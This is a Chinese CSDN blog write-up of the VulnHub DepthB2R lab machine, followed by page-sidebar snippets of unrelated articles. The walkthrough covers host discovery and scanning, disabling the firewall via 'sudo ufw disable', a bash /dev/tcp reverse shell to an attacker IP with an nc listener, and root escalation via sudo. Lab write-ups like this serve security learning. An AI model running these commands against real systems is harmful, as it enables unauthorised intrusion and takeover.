vulnhub depth漏洞复现超详细 呦呦呦

最新推荐文章于 2024-07-24 19:43:59 发布
最新推荐文章于 2024-07-24 19:43:59 发布
阅读量162 收藏
点赞数
文章标签: 服务器 网络 linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76467680/article/details/131946371
版权
该过程描述了一次网络渗透测试的步骤,包括使用netdiscover进行主机发现,nmap进行端口扫描,dirsearch进行目录枚举,然后通过SSH连接,发现并关闭防火墙,利用反弹shell技术,最终实现权限提升。
摘要由CSDN通过智能技术生成

DepthB2R.ova

先看一下自己的ip

ip a

主机发现

netdiscover -i eth0 -r 192.168.222.0/24

主机信息探测

nmap -p- 192.168.222.130

dirsearch -u"192.168.222.130:8080"

然后在本机网址拼接

然后输入ls -l/tmp

ps aux发现ssh猜测有防火墙

查看/etc果然有防火墙

尝试关闭

ssh bill@localhost sudo ufw disable

反弹shell同时开启监听

ssh bill@localhost bash -i >& /dev/tcp/192.168.222.129/4444 0>&1

nc -nvlp 4444~

提权

sudo -l

sudo su

whoami

至此,提权成功

"七鹊"
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
空间句法软件depthmap
08-31
深度映射(Depthmap)是一款在空间句法领域广泛应用的专业软件。空间句法是一种分析空间组织和几何结构的方法,尤其适用于城市规划、建筑设计和地理信息系统等领域。Depthmap提供了量化和可视化空间布局杂性的工具...
Depthmap.zip
09-15
深度图(Depthmap)是一款专为空间句法分析设计的专业软件。空间句法是一种研究空间组织和使用的方法,广泛应用于城市规划、建筑设计、地理信息系统等多个领域。Depthmap提供了丰富的功能,帮助用户对空间结构进行...
VulnHub DepthB2R 靶机渗透
Shadow的博客
04-08 357
DepthB2R 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-08 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 主机ip为172.16.1.22 nmap -p- -A -T5 172.16.1.22 只开放了8080端口,我们看看是什么 二、web渗透 没什么发,试试nikto扫描下 ni
depth anything解读与教程
m0_58846303的博客
02-18 5717
近日,TikTok发布一项新型AI技术“DepthAnything”,该技术由TikTok联合香港大学和浙江大学共同研发的一种先进单目深度估计(MDE)技术,能更有效地从2D图像中识别出深度信息图。基于这些深度信息图,普通的2D影像便可转化为3D影像。相比此前已有技术,“DepthAnything”在提升深度图的质量方面取得重大突破。此技术的应用将使得TikTok平台上有的海量2D影像能够轻松转化为3D影像,让普通手机拍摄的2D影像“一键转3D”,或将大幅推进XR产业的发展。
2024单目测距Depth anything解读和
ChengBUAA的博客
03-15 2996
2024年2月份,TikTok发布一项新型AI技术“DepthAnything”,该技术由TikTok联合香港大学和浙江大学共同研发的一种先进单目深度估计(MDE)技术,能更有效地从2D图像中识别出深度信息图。基于这些深度信息图,普通的2D影像便可转化为3D影像。相比此前已有技术,“DepthAnything”在提升深度图的质量方面取得重大突破。此技术的应用将使得TikTok平台上有的海量2D影像能够轻松转化为3D影像,让普通手机拍摄的2D影像“一键转3D”,或将大幅推进XR产业的发展。
决策树参数max_depth(最大深度)详细解析
AI_dataloads的博客
09-13 6803
总结起来,选择合适的max_depth值需要综合考虑模型性能、数据集大小和正则化技术。通过尝试不同的max_depth值并评估其性能,可以找到适合特定问题的最佳参数值。记住,决策树的max_depth参数是一个重要的调整参数,对模型性能有着显著影响。
Zabbix sql注入漏洞(CVE-2016-10134)
whojoe的博客
06-06 3431
Zabbix sql注入漏洞(CVE-2016-10134)环境搭建 环境搭建 zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统 启动docker systemctl start docker 下载vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/zabbix/CVE-2016-10134/ 启
weblogic权限绕过远程命令执行漏洞(CVE-2020-14482、CVE-2020-14883)
又菜又爱倒腾的博客
10-29 2307
#weblogic权限绕过/远程命令执行漏洞(CVE-2020-14482、CVE-2020-14883) # 一、漏洞简介 Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。 CVE-2020-14882:远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic 管理控制台。 CVE-2020-14
PetitPotam漏洞(ESC8)结合CVE-2019-1040
whojoe的博客
08-02 3196
PetitPotam漏洞环境搭建漏洞参考文章 环境搭建 主机 机器名 ip 用户 密码 版本 域控1 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 域控2 ad2.test.com 192.168.164.146 administrator Aa1234 win2012r2 域内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 kali
Aria2 任意文件写入漏洞
whojoe的博客
07-01 1191
Aria2 任意文件写入漏洞环境搭建漏洞参考文章 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/aria2/rce/ 启动容器 docker-compose up -d 查看容器 docker ps 这里kali的ip192.138.164.134 centos的ip192.
XDebug 远程调试漏洞(代码执行)
whojoe的博客
06-30 1959
XDebug 远程调试漏洞(代码执行)前言环境搭建 前言 因为自己在调试php的时候就是使用的xdebug,不过没有开启xdebug.remote_connect_back = 1,这个是给远程调试使用,可以使用任意主机进行调试,如果不配置的话仅通过指定ip才可以调试,比较安全 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git
depth-map-sr-Code.zip_MAP图像_depth-map_map sr_map分辨重建_深度图重建
07-14
该源码实了数字图像depth map深度图的分辨率重建。
DFS.rar_depth first search
09-21
深度优先搜索(DFS,Depth First Search)是一种在图或树数据结构中遍历或搜索的算法。这个"DFS.rar_depth first search"压缩包文件包含了实DFS算法的代码和相关资源,主要聚焦于如何通过DFS来解决图论问题。 DFS...
Robust Depth-Based Person Re-Identification
02-07
To overcome this problem, we propose to exploit depth information to provide more invariant body shape and skeleton information regardless of illumination and color change. More specifically, we ...
Linux:基础命令学习
qq_55038440的博客
07-20 1459
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
服务器压力测试
最新发布
weixin_60830013的博客
07-24 278
以下是一些关键步骤和考虑因素:1. 定义目标:• 明确测试的目标是什么,例如,确定最大并发用户数,响应时间阈值,吞吐量等。• 收集基准数据:• 在开始测试前,记录服务器的正常运行状态,包括CPU使用率,内存占用,磁盘I/O,网络流量等。• 选择测试工具:• 使用适当的负载测试工具,如JMeter,LoadRunner,Gatling,Apache Bench等。• 包括不同的用户数量,请求类型(GET,POST),数据大小,以及可能的并发操作。• 记录关键指标,如响应时间,吞吐量,失败率等。
14. Hibernate 一对多双向关联映射
这是一个web全栈开发的博客,取其精华去其糟粕,争取让大家一看就懂,一学就会,一用就成~
07-24 986
本节课程和大家一起聊聊一对多关联映射。通过本节课程,你将了解到:如何实一对多关联映射;如何实双向一对多关联映射;关联映射中的级联操作。
如果提升服务器安全性,使用快卫士给服务器上“锁”
qq_38647109的博客
07-24 394
服务器作为数据存储与业务处理的核心,其安全性直接关系到企业的运营稳定和信息安全。面对日益杂的网络攻击手段,如何有效提升服务器的安全防护能力,成为了每个企业和个人用户必须面对的重要课题。在众多服务器安全解决方案中,快卫士以其卓越的性能和全面的防护功能脱颖而出,成为提升服务器安全性的理想选择。
如何使上述的max_depth参数定义为整数型
06-02
如果需要将`max_depth`定义为整数型,可以使用Python内置的`int()`函数将其转换为整数。例如,将代码中的 ```python clf = xgb.XGBRegressor(max_depth=x1, learning_rate=x2, gamma=x3) ``` 修改为: ```python clf = xgb.XGBRegressor(max_depth=int(x1), learning_rate=x2, gamma=x3) ``` 这样就将`max_depth`转换为整数型了。需要注意的是,使用`int()`函数转换时,需要确保`x1`是一个整数或可以被转换为整数的类型。否则,将会引发一个类型错误。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值